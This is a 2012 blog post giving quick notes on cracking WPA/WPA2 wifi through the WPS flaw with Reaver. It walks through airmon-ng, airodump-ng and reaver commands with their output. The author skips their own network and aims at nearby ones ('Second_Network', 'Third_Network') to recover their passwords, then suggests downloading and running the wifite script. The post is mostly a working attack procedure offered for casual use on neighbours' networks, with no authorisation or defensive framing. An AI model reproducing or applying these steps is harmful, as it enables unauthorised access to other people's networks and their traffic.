Browsing all articles from October, 2012

Oct
20

Quick notes on Reaver (WPA attack)

Assuming all the tools are installed (http://code.google.com/p/reaver-wps/)

Reaver is an attack on WPA/WPA2 using a vulnerability in the WPS mechanism.

First up, we need to find out what our network cards are called, so use iwconfig to list wifi / network interfaces

iwconfig

iwconfig lo no wireless extensions.


wlan1     IEEE 802.11bgn  Mode:Monitor  Tx-Power=20 dBm

          Retry  long limit:7   RTS thr:off   Fragment thr:off

          Power Management:on
eth0      no wireless extensions.

wlan3 IEEE 802.11bg Mode:Monitor Tx-Power=20 dBm Retry long limit:7 RTS thr:off Fragment thr:off Power Management:on

In the above, we have wlan1 and wlan3 as possible interfaces.

Next up, we put the wifi card into monitor mode (pick a card)
Here I’m using wlan1

airmon-ng start

airmon-ng start wlan1


Found 2 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want to kill (some of) them!
PID	Name

1791	avahi-daemon

1792	avahi-daemon
Interface	Chipset		Driver

wlan1 Unknown rt2800usb - [phy0] (monitor mode enabled on mon0) wlan3 RTL8187 rtl8187 - [phy3]

That creates another interface (mon0 above), that we can connect to.
Next, we need to list the various wifi lans in the vicinity

We can use the new interface to do so (or use any existing wifi interface, doesn’t really matter)

airodump-ng mon0


CH 13 ][ Elapsed: 20 s ][ 2012-10-20 08:39                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                    
 EC:17:2F:F3:0F:A8  -35       21      241    0   7  54e  WPA2 CCMP   PSK  First_Network

 00:18:39:28:3B:2C  -72        9        0    0   5  54 . WPA2 CCMP   PSK  Second_Network

 00:25:BC:8D:4F:F5  -75        5        4    0  11  54e. WPA2 CCMP   PSK  Third_Network                           
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

EC:17:2F:F3:0F:A8 74:E2:F5:4D:C5:11 -1 0e- 0 0 2 EC:17:2F:F3:0F:A8 00:04:20:16:5E:52 -52 48 -54 0 14 EC:17:2F:F3:0F:A8 70:56:81:C2:1B:3B -66 0e- 1e 0 6 EC:17:2F:F3:0F:A8 00:23:4E:7E:FC:B4 -74 0e- 1 0 3 EC:17:2F:F3:0F:A8 00:08:65:30:93:D3 -76 36 -12e 0 217

Here you can see that the interface see’s 3 separate networks.
It can also identify that First_Network has connections from a number of computers

Ideally, we want to sniff the network with the most traffic, in this case, thats my existing network, so we’ll skip it.

We can see that Second_Network is on Channel 5, and Third_Network is on channel 11

Now we have enough information to try to discover the key for the other networks.

Startup reaver, and connect to a BSSID above

reaver -i mon0 -b BSSID -a -vv -c CHANNEL

BSSID’s –
00:18:39:28:3B:2C – Second_Network Channel 5
00:25:BC:8D:4F:F5 – Third_Network Channel 11

reaver -i mon0 -b 00:25:BC:8D:4F:F5 -vv -a -c11


Reaver v1.4 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Switching mon0 to channel 11 [+] Waiting for beacon from 00:25:BC:8D:4F:F5

This should connect to the network, and start to do its magic.

If you get issues like

[!] WARNING: Failed to associate with 00:25:BC:8D:4F:F5 (ESSID: Third_Network)

Then you need to try another with another wifi card chipset, as your drivers don’t support monitor mode correctly.

If it does connect, then you’re set. Let it run, and a few hours later, you should see the wifi name and password.

A much easier way to do all this, is of course to use the prepackaged scripts at

http://code.google.com/p/wifite/

wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py

chmod +x wifite.py

./wifite.py

Then have fun..

October 20, 2012 // Exploits, Technical Mumbo Jumbo, Useful Info // Comments Off // Tags: howto, reaver, wifi

Blog

Quick notes on Reaver (WPA attack)

Archives

Categories

Tags

PHOTOSTREAM

MENU

OPTIONS

ComputerSolutions